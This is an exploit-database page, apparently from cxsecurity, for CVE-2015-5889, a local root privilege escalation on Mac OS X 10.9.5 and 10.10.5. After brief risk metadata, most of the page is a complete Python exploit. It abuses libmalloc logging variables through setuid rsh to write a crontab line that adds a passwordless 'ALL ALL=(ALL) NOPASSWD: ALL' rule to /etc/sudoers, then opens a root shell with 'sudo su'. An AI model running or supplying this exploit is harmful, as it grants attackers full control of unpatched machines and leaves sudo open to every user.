Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation

2015.10.02
Credit: rebel
Risk: High
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root # tested on osx 10.9.5 / 10.10.5 # jul/2015 # by rebel import os,time,sys env = {} s = os.stat("/etc/sudoers").st_size env['MallocLogFile'] = '/etc/crontab' env['MallocStackLogging'] = 'yes' env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n' sys.stderr.write("creating /etc/crontab..") p = os.fork() if p == 0: os.close(1) os.close(2) os.execve("/usr/bin/rsh",["rsh","localhost"],env) time.sleep(1) if "NOPASSWD" not in open("/etc/crontab").read(): sys.stderr.write("failed\n") sys.exit(-1) sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..") while os.stat("/etc/sudoers").st_size == s: sys.stderr.write(".") time.sleep(1) sys.stderr.write("\ndone\n") os.system("sudo su")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top